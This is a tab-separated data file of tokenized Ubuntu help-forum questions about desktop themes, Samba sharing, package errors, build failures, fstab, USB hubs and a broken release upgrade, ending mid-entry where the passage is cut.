199455	how do i fix gnome shell themes ?	this is my fifth full format and install of ubuntu in under a month . i finally have my gnome 3 desktop working again , but again , the gnome shell themes is not select-able . i have asked the question of how to fix this common issue before , but i have seen no positive resolution . does anybody know of a simple fix ? this is a common issue and i have seen hundreds of postings related to it , but other users only seem to get half-way answers also and it goes unresolved . would it be advisable to completely purge gnome desktop and reinstall ? if so how would i do this ? i can not use any extensions if the shell is not working , so i am desperately seeking resolution for the issue . thanks in advance .
199456	how to setup complete file access and control on a network	i have a media server running ubuntu 12.04 and i want it setup so that any pc on the network ( windows etc ) has complete access to all files , folders etc with read , write , edit , copy to , copy from permissions . no need for security ( ie no password or user name , just select it on the network and start editing ) . i have samba installed and personal file sharing is enabled but my windows pc can not see it on the network . i already set up another server as i described but unfortunately i ca n't remember how or where i found the guides for it . any one know of a guide that covers what i want ?
199464	can not install languages	i try to install languages on my ubuntu 12.04 . unfortunately , it is not working , i only get info : `` software database is broken . it is impossible to install or remove any software . please use the package manager `` synaptic '' or run sudo apt-get install -f. in a terminal to fix this issue at first '' i did try to use this command and many other , without success . any command that i run basically does not detect anything and i still can not use german keyboard layout . anyone out there that could help ? ubuntu is really overwhelming..
199467	make command not working	i want to compile a game from github . i followed this guide http : //powdertoy.co.uk/wiki/w/compiling_for_linux.html and when i get to the end when i need to use the make command to compile i get the following error pavle @ pavle : ~/tpt $ make powder-sse gcc -c -w -std=c99 -d_posix_c_source=200112l -dluaconsole -dgravfft -iincludes/ -d_gnu_source -m32 -dlin32 -o3 -ffast-math -ftree-vectorize -funsafe-math-optimizations -march=native -dx86 -dx86_sse -o build/obj/air.powder-sse.o src/air.c in file included from /usr/include/math.h:28:0 , from src/air.c:18 : /usr/include/features.h:324:26 : fatal error : bits/predefs.h : no such file or directory compilation terminated . make : *** [ build/obj/air.powder-sse.o ] error 1 pavle @ pavle : ~/tpt $ what am i doing wrong i tried using sse2 , sse3 , 64bit nad opengl ( looked it up in the make file ) nothing worked . help please
199476	media buttons on keyboard with spotify	i 've added spotify preview as my defualt music program , by doing this . as doug suggested , simply add this line to your > ~/.local/share/applications/mimeapps.list file in two places , like so : [ default applications ] ... audio/x-vorbis+ogg=spotify.desktop [ added associations ] ... audio/x-vorbis+ogg=spotify.desktop ; but the media buttons doesnt seem to wan na work . is there any easy known way to fix this without binding special keys etc perhaps ?
199478	help with setting up aim account	can anyone help me configure my aim account ? i have oneiric and i want to set up my aim account with what i believe is a chat client ( the envelope icon on the top right ) . it is called empathy . \n i tried to do this using broadcast account . it let me choose what account ( jabber , pidgin , aim , etc ... ) . once i entered my password for my aim account , i got a pop-up asking for the master password for my keyring . i did n't know what that was at the time so i closed that window after trying to enter my account password . keyring apparently asks for a master password and it holds any keys you want to remember in the future . it gave me an error so i could n't set up my aim account completely . now i 'm trying to get back to that screen but i can only set up a twitter or facebook . can anyone tell me how to break the message up so it does n't appear all on one line ? i tried 'coding ' a \n ... seemed to work .
199485	how to trace my network 's steps	question ( concise version ) : where in my log files would i find information regarding the networking steps executed between the time i have left the login screen and the time i have landed comfortably at my desktop screen ? $ uname -a linux schmo 3.2.0-31-generic-pae # 50-ubuntu smp fri sep 7 16:39:45 utc 2012 i686 i686 i386 gnu/linux question ( longer version with more than one clause ) : who , or what daemon , or which scripts are responsible for setting up my network settings at login ? i have found that several attempts to modify /etc/network/interfaces either go ignored or end in a non-functioning setup , but that the two-line original loopback version works fine . i want to know where the action is actually happening . what .conf 's and bash scripts should i pepper with echo-and-dump statements , or what environment variables should i be aware of and set , if the current level of feedback in the currently-available log files is not of a resolution high enough to catch the network changes being performed during login ? motivation ( at least one of them ) : how would i go about telling my computer to establish a wireless bridge after my wireless network adapter is up and running , which itself seems to occur only after i log in , sometimes completing after i have already clicked on firefox but before i remember to look for the wifi status icon , argh . what i 've done so far : successfully added a vm running precise server i686 to my precise desktop i686 using kvm successfully updated , upgraded , and added to the packages on the vm through the bridge setup suggested at http : //devilsworkshop.org/tutorial/create-virtual-machineos-ubuntu-1204-kvm/59576/ , and following the course of https : //help.ubuntu.com/12.04/serverguide/index.html , while ssh 'd from my desktop . this implies the bridge was working , if only for one session . my guess is that between the time i set up my /etc/network/interfaces file and the time i no longer had internet access through my vm , the changes i ( or kvm , or someone ) made to my configuration files had propagated only partially through my system ( s ) from boot to boot and restart to restart , whatever that means . unsuccessfully tried to resurrect vm internet access by adding wlan0 to /etc/network/interfaces in various forms , including installing wpa_supplicant . received an error from wpa_supplicant which i believe i was able to trace back to the fact that wpa services are mysteriously already running each time i restart networking . this led me to the discovery that ... avahi will not stay dead due to being respawned by process # 1 ; avahi then runs other stuff , and may be responsible for the normally satisfying , but now vexing , behavior of my wireless connection coming alive each time i log in ( or not doing so , if i try to modify /etc/network/interfaces ) . more details are available ; just tell me what you 'd like . i am playing a game of chutes-and-ladders with the heaps of knowledge i have learned from trying what i have so far , and the vast chasms of ignorance about even basic terms and sop that keep me from putting things together . i have looked at this help.ubuntu.com page . note the part about wireless bridging . i have my reasons for ignoring this caveat for the moment .
199486	$ path not working	how can this happen ? jon @ vaio : ~/brickify $ /usr/bin/node -v v0.8.11 jon @ vaio : ~/brickify $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games jon @ vaio : ~/brickify $ node -v jon @ vaio : ~/brickify $ /usr/bin is in $ path , so just writing node -v should work the same as writing /usr/bin/node -v
199487	`` general error mounting file systems ''	no idea what i 've done , but i just started getting this error everytime i boot . running ubuntu 12.04 . i was able to see more of the boot log by removing splash and quiet from grub . i believe this is the culprit : init : mountall main process ( 306 ) terminated with status 1 i 've done as nikth suggested , however my fstab is present and has the correct uuid : ubuntu @ ubuntu : /mnt/etc $ cat fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=8f1d7319-7383-4151-bb2b-db84fd079d50 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=5dc94483-0bad-4afe-9b46-96ba0fb83b3c none swap sw 0 0 blkid : ubuntu @ ubuntu : /mnt/etc $ sudo blkid /dev/loop0 : type= '' squashfs '' /dev/sda1 : label= '' system reserved '' uuid= '' 005c1a835c1a741e '' type= '' ntfs '' /dev/sda2 : uuid= '' 4cfa26fdfa26e2c6 '' type= '' ntfs '' /dev/sda5 : uuid= '' 8f1d7319-7383-4151-bb2b-db84fd079d50 '' type= '' ext4 '' /dev/sda6 : uuid= '' 5dc94483-0bad-4afe-9b46-96ba0fb83b3c '' type= '' swap '' /dev/sdb1 : uuid= '' be98191d9818d5ad '' type= '' ntfs '' /dev/sdc1 : label= '' multiboot '' uuid= '' 3226-d49a '' type= '' vfat '' also , fsck does not seem to find any problems : ubuntu @ ubuntu : / $ sudo fsck /dev/sda5 fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) /dev/sda5 : clean , 211250/8994816 files , 2044589/35973120 blocks how can i fix this ? if additional information is required , i can provide .
199488	linux kernel image 3.2.0 on 32 bit x86 smp but i have only 1 gb ram	an update has come named linux kernel image for version 3.2.0 on 32 bit x86 smp and it also says geared toward 32 bit desktop or server systems with more than 4gb ram . you likely do not want to install this package directly . instead , install the linux-generic-pae meta-package , which will ensure that upgrades work correctly , and that supporting packages are also installed . so what should i do ? i do not want any problems . also i 've heard that kernel updates are problematic and i 've received 6 of them .
199489	what 's the easiest way to upgrade ghostscript ?	i have version 8 of ghostscript on my ubuntu 10.04 server . what is the easiest way to install version 9 ? source install ? ppa ? something else ?
199492	where can i find my unity to download	i 'm really new here and i have installed ubuntu 12.04 on my pc . i have read about `` my unity '' that was supposed to be part of 12.04 but was n't included ? does anybody know where i can find it ?
199493	oracle java installer fails with licence not accepted	g'day all , i am running ubuntu 12.04 when trying to upgrade the oracle java installer from the webupd8team ppa i get an error that says i declined to accept the licence . i am never offered the option of accepting the licence . the installer has been a great way to install and keep oracle java up to date . i 'd like to keep using it . any fixes ? thanks ,
199504	dual booting windows 7 and ubuntu 12.04 . partition sizes ?	i 'm about to reinstall windows , so i thought that i 'd try ubuntu out on a partition just for fun . my question is , how large should my partitions be for each of them ? i know this various depending on what you use , so i 'll give you a general idea of what i have , and what i have in mind . i 'm currently running : windows 7 professional ( 64bit ) ram : 4gb cpu : 2.5ghz quad core processor hdd : 500gb gpu : 1gb nvidia geforce i have around 130gb in steam games , and some heavier applications like photoshop cs6 , sony vegas pro 11 . but other applications i use are : chrome skype dxtory fraps openoffice bittorrent and other assorted smaller programs . so , i was thinking that i would give my windows partition about 150-200gb , my ubuntu partition around 20gb , and the rest to shared storage . i 'm not really sure if i 'd need more or less on ubuntu , because i 've never used it and i 'm not really sure what kind of apps i 'd be using over there . this would also be a clean install , so i 'd be wiping my hdd , creating the partitions in gparted , then installing windows with ubuntu following that . any critique you could give me ? maybe explanations to what the /root , /boot and /home partitions i hear are about ? thanks in advanced if you actually read this lengthy thing ! any help is appreciated . ( x
199506	is there any video player that plays youtube playlists ?	flash support for linux is still lacking . older hardware often performs only poorly when trying to watch youtube videos . there are several external players ( vlc , mplayer , minitube ) that alleviate this problem by offering video playback without flash . but none of them support parsing youtube playlists out of the box . is there any way i can play youtube playlists without having to rely on flash ?
199509	usb hub and ubuntu	i have a powered 7 port hub connected to my ubuntu box and it does nothing . the devices ( zip drive and web cam ) work direct , but are n't recognized through the hub . this worked fine in windows 7 . i ca n't prove it is the os because this is a new motherboard and processor . any advice ? edit : output from lsusb -v bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0002 2.0 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic ehci_hcd iproduct 2 ehci host controller iserial 1 0000:00:12.2 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 hub descriptor : blength 9 bdescriptortype 41 nnbrports 5 whubcharacteristic 0x000a no power switching ( usb 1.0 ) per-port overcurrent protection bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0503 highspeed power enable connect port 3 : 0000.0100 power port 4 : 0000.0100 power port 5 : 0000.0100 power device status : 0x0001 self powered bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0002 2.0 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic ehci_hcd iproduct 2 ehci host controller iserial 1 0000:00:13.2 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 hub descriptor : blength 9 bdescriptortype 41 nnbrports 5 whubcharacteristic 0x000a no power switching ( usb 1.0 ) per-port overcurrent protection bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power port 3 : 0000.0100 power port 4 : 0000.0100 power port 5 : 0000.0100 power device status : 0x0001 self powered bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0002 2.0 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic ehci_hcd iproduct 2 ehci host controller iserial 1 0000:00:16.2 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 hub descriptor : blength 9 bdescriptortype 41 nnbrports 4 whubcharacteristic 0x000a no power switching ( usb 1.0 ) per-port overcurrent protection bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power port 3 : 0000.0100 power port 4 : 0000.0100 power device status : 0x0001 self powered bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0001 1.1 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic ohci_hcd iproduct 2 ohci host controller iserial 1 0000:00:12.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0002 1x 2 bytes binterval 255 hub descriptor : blength 9 bdescriptortype 41 nnbrports 5 whubcharacteristic 0x0002 no power switching ( usb 1.0 ) ganged overcurrent protection bpwron2pwrgood 2 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power port 3 : 0000.0100 power port 4 : 0000.0100 power port 5 : 0000.0100 power device status : 0x0001 self powered bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0001 1.1 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic ohci_hcd iproduct 2 ohci host controller iserial 1 0000:00:13.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0002 1x 2 bytes binterval 255 hub descriptor : blength 9 bdescriptortype 41 nnbrports 5 whubcharacteristic 0x0002 no power switching ( usb 1.0 ) ganged overcurrent protection bpwron2pwrgood 2 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power port 3 : 0000.0100 power port 4 : 0000.0100 power port 5 : 0000.0100 power device status : 0x0001 self powered bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0001 1.1 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic ohci_hcd iproduct 2 ohci host controller iserial 1 0000:00:14.5 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0002 1x 2 bytes binterval 255 hub descriptor : blength 9 bdescriptortype 41 nnbrports 2 whubcharacteristic 0x0002 no power switching ( usb 1.0 ) ganged overcurrent protection bpwron2pwrgood 2 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power device status : 0x0001 self powered bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 0 full speed ( or root ) hub bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0001 1.1 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic ohci_hcd iproduct 2 ohci host controller iserial 1 0000:00:16.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0002 1x 2 bytes binterval 255 hub descriptor : blength 9 bdescriptortype 41 nnbrports 4 whubcharacteristic 0x0002 no power switching ( usb 1.0 ) ganged overcurrent protection bpwron2pwrgood 2 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0303 lowspeed power enable connect port 2 : 0000.0100 power port 3 : 0000.0100 power port 4 : 0000.0100 power device status : 0x0001 self powered bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 1 single tt bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0002 2.0 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic xhci_hcd iproduct 2 xhci host controller iserial 1 0000:02:00.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 hub descriptor : blength 9 bdescriptortype 41 nnbrports 2 whubcharacteristic 0x0009 per-port power switching per-port overcurrent protection tt think time 8 fs bits bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power device status : 0x0001 self powered bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 3.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 3 bmaxpacketsize0 9 idvendor 0x1d6b linux foundation idproduct 0x0003 3.0 root hub bcddevice 3.02 imanufacturer 3 linux 3.2.0-32-generic xhci_hcd iproduct 2 xhci host controller iserial 1 0000:02:00.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 31 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 bmaxburst 0 hub descriptor : blength 12 bdescriptortype 42 nnbrports 2 whubcharacteristic 0x0009 per-port power switching per-port overcurrent protection bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere bhubdeclat 0.0 micro seconds whubdelay 0 nano seconds deviceremovable 0x00 hub port status : port 1 : 0000.02a0 5gbps power rx.detect port 2 : 0000.02a0 5gbps power rx.detect binary object store descriptor : blength 5 bdescriptortype 15 wtotallength 15 bnumdevicecaps 1 superspeed usb device capability : blength 10 bdescriptortype 16 bdevcapabilitytype 3 bmattributes 0x00 latency tolerance messages ( ltm ) supported wspeedssupported 0x0008 device can operate at superspeed ( 5gbps ) bfunctionalitysupport 3 lowest fully-functional device speed is superspeed ( 5gbps ) bu1devexitlat 3 micro seconds bu2devexitlat 2047 micro seconds device status : 0x0001 self powered bus 001 device 002 : id 04a9:1709 canon , inc. pixma mp150 scanner device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x04a9 canon , inc. idproduct 0x1709 pixma mp150 scanner bcddevice 1.08 imanufacturer 1 canon iproduct 2 mp150 iserial 3 20bc24 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 62 bnuminterfaces 2 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xc0 self powered maxpower 2ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 3 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 255 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x07 ep 7 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x88 ep 8 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x89 ep 9 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 11 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 2 binterfaceclass 7 printer binterfacesubclass 1 printer binterfaceprotocol 2 bidirectional iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0001 self powered bus 007 device 002 : id 046d : c517 logitech , inc. lx710 cordless desktop laser device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x046d logitech , inc. idproduct 0xc517 lx710 cordless desktop laser bcddevice 38.10 imanufacturer 1 logitech iproduct 2 usb receiver iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 59 bnuminterfaces 2 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 98ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 1 boot interface subclass binterfaceprotocol 1 keyboard iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.10 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 59 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 10 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 1 boot interface subclass binterfaceprotocol 2 mouse iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.10 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 177 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 10 device status : 0x0000 ( bus powered ) this is with the powered hub plugged in .
199516	switch different language pairs with separate key combinations	i use 3 different languages on my laptop , but most of time i need only 2 of them , so switching with ctrl+shift is quite annoying . is there a way to use ctrl+shift for 2 languages and have some special combination to temporarily switch to the 3rd one ? note : there 's very similar question , but in my question i 'd like to make emphasis on switching between 2 languages with normal key combination .
199517	ssd and hdd have window 7 recovery partition . can i delete one to make room for ubuntu ?	i 'm trying to install ubuntu right now , and i 've run into a problem . i have windows 7 installed on my ssd , and i want to install ubuntu on my hdd , but i already have three partitions on my hdd . the partitions are two recovery partitions and one data partition . what i do n't understand is why my data drive ( the hdd ) has recovery partitions for windows 7 ? the same recovery partitions ( or atleast i think they are the same . same sizes , same names , same order ) are on the ssd with the windows 7 install . can i safely delete the recovery partitions on the hdd ? my other option , i think , is to put the boot partition for ubuntu on the ssd where i only have three partitions . then i can put the other three logical partitions for ubuntu in an extended partition on the hdd . can i do that , put the boot partition on one drive and the other partitions on another ? here is a picture of the partitions and i have circled the one i would like to delete to make room .
199519	is there a way or an option to file roller to use a single window session ?	is there a way or an option in file roller to use a single window session . the default is to open a separate window for each archive you open . is this possible , or are there alternative archive-managers with this capability ?
199522	broken upgrade from 10.04 to 12.04 on a vps - recoverable ?	i have a vps hosted 1500 km away . it originally came with 9.10 - and this morning i decided that i really should get to an lts release , and figured i 'd jump to 12.04 . researching , i discovered that there is no direct path between 9.10 and 12.04 , but that i could upgrade via 10.04 . after backing up my data , i dove in . the upgrade to 10.04 was successful , and i proceeded to upgrade to 12.04 . things started to go wrong . first , i got an error with glibc - i retried and got the same error . that 's when i stopped the upgrade . i then tried another round of apt-get update & & apt-get upgrade and got a list of `` unmet dependencies '' : apt : depends : ubuntu-keyring but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.11.1-0ubuntu7.11 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.4.3-4ubuntu5.1 is to be installed predepends : dpkg ( > = 1.15.7.2 ) but 1.15.5.6ubuntu4.6 is to be installed apt-utils : depends : libapt-pkg-libc6.10-6-4.8 libapt-inst1.4 : depends : libc6 ( > = 2.14 ) but 2.11.1-0ubuntu7.11 is to be installed libapt-pkg4.12 : depends : libc6 ( > = 2.15 ) but 2.11.1-0ubuntu7.11 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.4.3-4ubuntu5.1 is to be installed libc6 : depends : libc-bin ( = 2.11.1-0ubuntu7.11 ) but 2.15-0ubuntu10.2 is to be installed libept0 : depends : libapt-pkg-libc6.10-6-4.8 libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9 ) but 1.0.1-1 is to be installed i tried to see if i could do something about these - using apt-get -f install . this told me 